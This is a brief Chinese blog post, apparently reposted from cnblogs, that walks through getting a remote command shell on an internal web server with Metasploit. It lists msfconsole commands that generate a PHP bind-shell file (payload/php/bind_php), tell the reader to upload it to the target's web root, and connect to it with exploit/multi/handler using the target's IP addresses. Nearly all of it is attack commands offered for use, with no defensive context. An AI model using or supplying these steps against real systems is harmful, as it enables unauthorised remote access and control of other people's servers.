php结合msf反弹内网shell
2021-06-19 12:05
标签:xpl sha 就会 use php 分享 修改 运行 外网 感谢: perl6大佬分享的姿势。 MSF: msf > use payload/php/bind_php 然后将xishaonian.php传到web上。 use payload/php/bind_php 访问web上的xishaonian.php,就可以反弹到cmdshell了。 php结合msf反弹内网shell 标签:xpl sha 就会 use php 分享 修改 运行 外网 原文地址:http://www.cnblogs.com/xishaonian/p/7192497.html
msf exploit(handler) > set PAYLOAD payload/php/bind_php
msf exploit(handler) > set RHOST 目标内网ip
msf payload(bind_php) > generate -f f:/xishaonian.php -t raw //之后就会在f盘生成xishaonian.php脚本一般都是需要修改一下,没有php标签就加个php标签之类的。
然后再次运行msf
msf payload(bind_php) > set RHOST 目标外网ip
msf payload(bind_php) > use exploit/multi/handler
msf exploit(handler) > set payload php/bind_php
msf exploit(handler) > run